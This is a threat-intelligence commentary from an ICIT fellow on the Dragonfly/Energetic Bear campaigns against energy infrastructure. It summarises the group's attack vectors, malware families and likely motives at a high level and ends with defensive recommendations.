by James Scott, Sr. Fellow, ICIT
Show-of-force intelligence gathering and cyber-kinetic sabotage malware attacks against United States Energy infrastructure are neither novel nor warrant mass-hysteria attempts by fear mongers seeking to exploit the incident for personal gain. They are deliberate campaigns meant to demonstrate capabilities while offering no real threat to the distributed U.S. energy grid; thereby, not evoking a decisive and overwhelming retort from U.S. Intelligence agencies.
From 2011 to 2014, the Eastern European threat actor Dragonfly, also known as Energetic Bear, targeted the Defense Industry, Energy Industry, and ICS equipment manufacturers with highly technical prolonged attacks that are suggestive of a state sponsor. As of 2013, U.S. Energy facilities were the primary target of Energetic Bear; but, the adversary continued to target facilities in Poland, Turkey, and other nations. After nearly two years of minimal activity, Energetic Bear activity was allegedly rediscovered in 2017 after compromising over 20 Energy systems in the United States, Turkey, and Switzerland. The advanced persistent threat group is primarily interested in gathering intelligence and establishing persistence on foreign Energy infrastructure as a demonstration of Russian nation-state capabilities, as preplacement for future sabotage campaigns, or as a stage in cyber-kinetic attacks. The 2017 campaign appears focused on learning how Energy facilities operate and on gaining access to operational systems such as the interfaces used to send commands to equipment like circuit breakers or ICS/SCADA components.
Dragonfly specializes in targeting organizations with lackadaisical cybersecurity, cyber-hygiene or IT-OT separation and tangential third-party networks that could be compromised as part of lateral-access attacks. Common attack vectors include spear-phishing emails, watering-hole attacks featuring niche sites, and trojanization of legitimate software. Reported lures include New Year’s Eve party invitations, but could also include current events topics such as instructions about how Energy facilities should respond to incoming hurricanes. Opened lures used publicly available tools like the Phishery toolkit (Trojan.Phisherly), obtainable on Github, to steal user credentials via a template injection attack and then leak the victim network credentials to external servers. The threat actor then leveraged the harvested credentials to install Backdoor.Goodor, Backdoor.Dorshel, or the custom Trojan.Karagany.B to establish persistence on compromised systems and to deliver additional malware. Energetic Bear’s exploit kit features specialized malware, likely developed or adapted by the attackers, that was compiled during business hours (Monday – Friday, 9 am – 6 pm) UTC+4, which corresponds to working hours in Russia or Eastern Europe. Custom malware that strongly links these attacks to Dragonfly includes Trojan.Heriplor, which was custom developed by the APT and is not available on Deep Web markets, and Trojan.Karagany.B, which is not widely available, but has been used by the group in past targeted attacks.
The possibility of credible cyber-kinetic sabotage attacks, while legitimate, are diminished by the distributed nature of the United States Energy grid, the redundancy systems in place, and the likelihood that the sophisticated adversary could adequately anticipate and prudently avoid the attentive response of U.S. intelligence services. The APT has taken screenshots of systems compromised in the 2017 campaign and labeled them with the [machine description and location].[organization name] format. Captures of some systems were labeled with the “cntrl” string, indicating the placement of malware capable of controlling or sabotaging the host. The recent iteration of Dragonfly utilizes more publicly available tools such as Powershell, PsExec, Bitsadmin, Phishery, and Screenutil and any use of zero-day exploits have not been discovered or disclosed. This could indicate that the group is attempting to obfuscate its activities, that it is actually mercenary in nature, or that the freely available tools and Malware-as-a-Service market have started to reach acceptable sophistication, utility, and quality standards to merit use in a sophisticated campaign instead of wasting resources developing custom malware that can be used to establish attribution.
If Dragonfly is a Russian state-sponsored group, then the compromises could be a show-of-force meant to indirectly respond to recent sanctions placed on the sponsor. If the group is mercenary, the campaign could be a demonstration of skill. In either case, while the capability exists, actual cyber-kinetic impacts similar to the Black Energy malware attacks against Ukraine, would do little other than draw the ire of the United States and its allies. Considering that Energetic Bear has only just reemerged, the likelihood that it would substantiate an attack that would necessitate its immediate dispersion is minimal.
Sophisticated Advanced Persistent Threat campaigns from Dragonfly or other adversaries targeting the Energy sector are not novel and will continue as Digital Warfare metastasizes into a distinct theater of geopolitical and socioeconomic conflict. United States critical infrastructure systems, especially those in the Energy sector, can best be protected through layered defense-grade cybersecurity solutions, devout adherence to cyber-hygiene best practices, assignment of need-based access privileges, and comprehensive segregation of IT-OT networks and systems. Multi-factor authentication, robust passwords, and strong at-rest and in-transit data encryption should be required to slow malicious advancement through compromised systems and to limit the impact of any attacks.